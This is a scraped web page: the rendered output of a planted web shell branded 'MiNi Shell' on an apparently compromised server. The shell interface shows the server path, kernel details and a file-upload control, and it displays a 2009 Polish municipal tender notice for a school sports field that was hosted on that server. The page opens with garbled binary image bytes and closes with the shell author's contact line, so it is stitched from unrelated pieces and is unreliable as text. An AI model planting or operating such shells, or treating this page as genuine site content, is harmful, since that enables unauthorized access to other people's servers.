JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090728/121145-N-2009.html

<p class="kh_header"><b>Węgorzewo: Budowa boiska wielofunkcyjnego przy Szkole Podstawowej Nr 1 w Węgorzewie 2009-2010.</b><br>
<b>Numer ogłoszenia: 121145 - 2009; data zamieszczenia: 28.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgorzewo , ul. Zamkowa 3, 11-600 Węgorzewo, woj. warmińsko-mazurskie, tel. 087 4275424, faks 087 4275401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegorzewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska wielofunkcyjnego przy Szkole Podstawowej Nr 1 w Węgorzewie 2009-2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: Budowę boiska wielofunkcyjnego przy SP Nr 1 w Węgorzewie o nawierzchni z trawy syntetycznej, pow.  około 2 445,50 m2 .
Zakres rzeczowy zadania obejmuje:  
1. Wykonanie warstwy wyrównującej z miału kamiennego ( bazalt, granit, gnejs, mika) frakcji 1-4 mm, grubości 4 cm, o wymiarach 67 m x 36,5 m. 
2.  Ułożenie nawierzchni ze sztucznej trawy wypełnionej piaskiem kwarcowym  o wymiarach 67 m x 36,5 m. Wykonanie linii wyznaczających: wzdłuż boisko do piłki nożnej, w poprzek trzy korty tenisowe, w których na dwóch zewnętrznych wkleić należy linie  boisk do piłki ręcznej.    
a/ Parametry sztucznej trawy:włókno polietylenowe odporne na promieniowanie UV, wys. włókien 18-20 mm, wysokość trawy 18-22 mm, ilość włókien/m2 >100000,  
b/ kolor pola - zielony do piłki nożnej, ceglastoczerwony na kortach tenisowych, 
c/ kolor linii- biały, linie wklejone w nawierzchnię. 
3. Nawierzchnia winna posiadać aktualny: Atest higieniczny PZH i Aprobatę Techniczną ITB. 
Próbka materiałowa wraz z metryczką winna być dołączona do oferty.
4. Montaż bramek do piłki nożnej /bramki dostarczy Zamawiający/, tulei pod słupki do tenisa i bramki do piłki ręcznej. 
5. Wykonanie 207 m ogrodzenia  z siatki ( oko 5 x 5 cm ) o wysokości 4 m, na zabetonowanych słupkach stalowych ( rura O 50 )  krytych daszkami, w rogach i przy bramach, i furtkach wzmocnionych zastrzałami. Dwie furtki dla zawodników  o wymiarach 1,0 x 2,0 m oraz brama techniczna o wymiarach 4,0 x 2,0 m.
6. Pełna obsługa geodezyjna wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 8 000,00 zł /słownie złotych: osiem tysięcy/. Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy .Wadium  w pieniądzu należy wnieść na konto Zamawiającego: 33 1020 4753 0000 0802 0006 0749 
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy nie wykluczeni na podstawie art.24 ust.1 i 2 i spełniający warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku (Dz. U. z 2006 r. Nr 164 poz.1163) a także zamawiający wymaga, aby wykonawca: 

1) wykazał, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie    zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie   zrealizował co najmniej jedno  zamówienie w zakresie budowy boiska o nawierzchni ze sztuczną trawą i wartości brutto minimum 300 000 zł. 
Wykazane zamówienie zostanie uznane, jeśli będzie poparte dokumentem potwierdzającym, że zlecone roboty zostały wykonane z należytą starannością (np. referencje, protokół odbioru itd); 
2) wykazał do realizacji niniejszego zamówienia osoby z uprawnieniami budowlanymi  do pełnienia samodzielnej funkcji kierowniczej w specjalności konstrukcyjno - budowlanej, które przynależą do Izby Samorządu Zawodowego lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób posiadających kwalifikacje zawodowe niezbędne do pełnienia funkcji kierowniczej. 
3) jest ubezpieczony od odpowiedzialności cywilnej /OC/ w zakresie prowadzonej działalności na kwotę minimum 300.000,00 zł,- złotych
5) posiada środki finansowe lub zdolność kredytową na kwotę minimum 300 000 zł.
Ocena spełnienia warunków udziału w postępowaniu; sprawdzenie kompletności żądanych dokumentów,  zostanie dokonane zgodnie z formułą, spełnia / nie spełnia w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art.26 ust.3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawcy mają dostarczyć: 
1) oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy. 
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy.                                                                                                                                   
3) Pełnomocnictwo, w przypadku gdy wykonawcę reprezentuje pełnomocnik lub gdy wykonawcy    wspólnie ubiegają się o udzielenie zamówienia.

4) Zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiedni, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy.

5). wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie minimum 1 zamówienie w zakresie budowy boiska o nawierzchni ze sztuczną trawą i wartości brutto minimum 300 000 zł. z załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. W przypadku podmiotów występujących wspólnie dokument składa ten Wykonawca, który spełnia warunek udziału w postępowaniu.
6)  wykaz osób, zdolnych do wykonania zamówienia, które będą uczestniczyć w wykonaniu zamówienia, posiadających uprawnienia budowlane do pełnienia samodzielnej funkcji kierowniczej w specjalności konstrukcyjno - budowlanej, lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia wraz z wykazem (wzór nr 2.4.) W przypadku gdy Wykonawca przedłoży  pisemne zobowiązanie innych podmiotów, zobowiązany jest do wypełnienia wykazu osób zdolnych do wykonania zadania (wzór 2.4.) i przedłożyć kopie uprawnień.
7)  kopie uprawnień budowlanych osób wymienionych w wykazie, o którym mowa w pkt 6 posiadających kwalifikacje zawodowe niezbędne do wykonania zamówienia o specjalności konstrukcyjno - budowlanej, oraz aktualne zaświadczenia o wpisie do okręgowej  Izby Inżynierów budownictwa.
8) Polisa a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 300 000 PLN
9) Informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków lub zdolność kredytową wykonawcy, na kwotę min. 300 000 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://gmina.wegorzewo.sisco.info/?przetargi=1.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać w siedzibie Zamawiającego 11 - 600 Węgorzewo przy ul. Zamkowej 3 pok.35, pn.- pt. 800 - 1500 , a także złożyć wniosek o jej przesłanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 12:00, miejsce: Oferty należy składać w sekretariacie UM w  Węgorzewie przy ul. Zamkowej 3, pok. Nr 39 /I - piętro/..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com